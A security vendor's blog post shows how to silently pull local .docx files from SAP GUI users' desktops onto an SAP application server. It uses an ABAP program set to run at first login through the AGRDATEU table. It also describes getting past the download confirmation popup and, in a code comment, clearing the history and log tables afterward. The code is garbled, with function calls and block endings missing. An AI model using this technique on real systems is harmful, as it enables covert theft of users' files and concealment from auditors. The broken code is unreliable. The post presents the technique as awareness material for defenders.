In this blog post, we will demonstrate how to retrieve local files from a user's desktop via SAP GUI in SAP systems. The method involves creating an ABAP program that runs upon the user's first login and moves selected files to a local server. This technique highlights potential security vulnerabilities that SAP system administrators and security experts should be aware of.
First, we create an ABAP program in the SAP system to be connected. Below is the program code:
DATA: lv_filename TYPE string,
file_content TYPE string,
lv_file_line TYPE string,
lt_file_data TYPE TABLE OF string.
DATA: filename LIKE rlgrap-filename,
directory LIKE bdschko16-target_dir,
itab_dir LIKE sdokpath OCCURS 0 WITH HEADER LINE,
itab_file LIKE sdokpath OCCURS 0 WITH HEADER LINE,
dstpath LIKE draw-filep.
directory = 'C:\Users\burha\OneDrive\Desktop\'.
" You can use %UserProfile%\Desktop instead of static
dstpath = '/usr/sap/trans/tmp/new_dir/'.
" Chose this directory for easier access to files imported from the local PC
directory = directory
FILTER = '*.docx'
file_table = itab_file
dir_table = itab_dir.
IF sy-subrc <> 0.
" Error handling
LOOP AT itab_file.
filename = directory && itab_file-pathname
filetype = 'ASC'
data_tab = lt_file_data
file_open_error = 1
file_read_error = 2
no_batch = 3
gui_refuse_filetransfer = 4
invalid_type = 5
no_authority = 6
unknown_error = 7
bad_data_format = 8
header_not_allowed = 9
separator_not_allowed = 10
header_too_long = 11
unknown_dp_error = 12
access_denied = 13
dp_out_of_memory = 14
disk_full = 15
dp_timeout = 16
not_supported_by_gui = 17
error_no_gui = 18
OTHERS = 19.
IF sy-subrc <> 0.
MESSAGE ID sy-msgid TYPE sy-msgty NUMBER sy-msgno
WITH sy-msgv1 sy-msgv2 sy-msgv3 sy-msgv4.
DATA: lv_server_dest TYPE string.
lv_server_dest = dstpath && itab_file-pathname.
IF sy-subrc <> 0.
LOOP AT lt_file_data INTO lv_file_line.
TRANSFER lv_file_line TO lv_server_dest.
CLOSE DATASET lv_filename.
" Clear history after execution
" Logs tables: USR04 VE USH04
Now let's link the file we created to a tcode. For this, we create a new transaction code using the tcode SE93
Now that we have our tcode, we add a new row to the AGRDATEU table for this program to run the first time the user logs into the system.
The files will be selected according to the filter we provide in the ABAP program code and registered in the /usr/sap/trans/tmp/new_dir
folder of the server.
When the user logs in to the system, the security popup for the file download will be active. This confirmation can be overlooked by careless users. In addition, if desired, it can be changed from the SAP GUI settings or from the registry root of the current computer.
Then, you can see this local file in the application server directory.
SAP GUI security settings did not perform this check before version 7.20. However, after 7.20, the permission section for file upload and download operations has been improved.
Although this vulnerability is unlikely to be exploited, it is important for SAP system administrators to be aware of such methods and take preventive measures. DefenceMore's One Click Audit for SAP can help protect your systems from such attacks.
Contact us to learn more and schedule a free demo of our product that detects security vulnerabilities in SAP systems. Ensure your systems are not only functional but also secure.
A collection of articles, tutorials, and news about DefenceMore, SAP and security.
Explore the importance of authorization objects in SAP systems and understand the critical tables that play a key role in SAP security.
Understand the importance of keeping SAP GUI versions updated for security and how to plan upgrades effectively.
Understand the different types of profile files and system parameters in SAP systems, and learn how DefenceMore's One Click Audit can help ensure their security.
Learn about the critical CVE-2023-40309 vulnerability in SAP systems, its impact, and the corrective steps to secure your environment.
Discover the vulnerabilities in your SAP systems and learn about DefenceMore's One Click Audit for SAP Systems.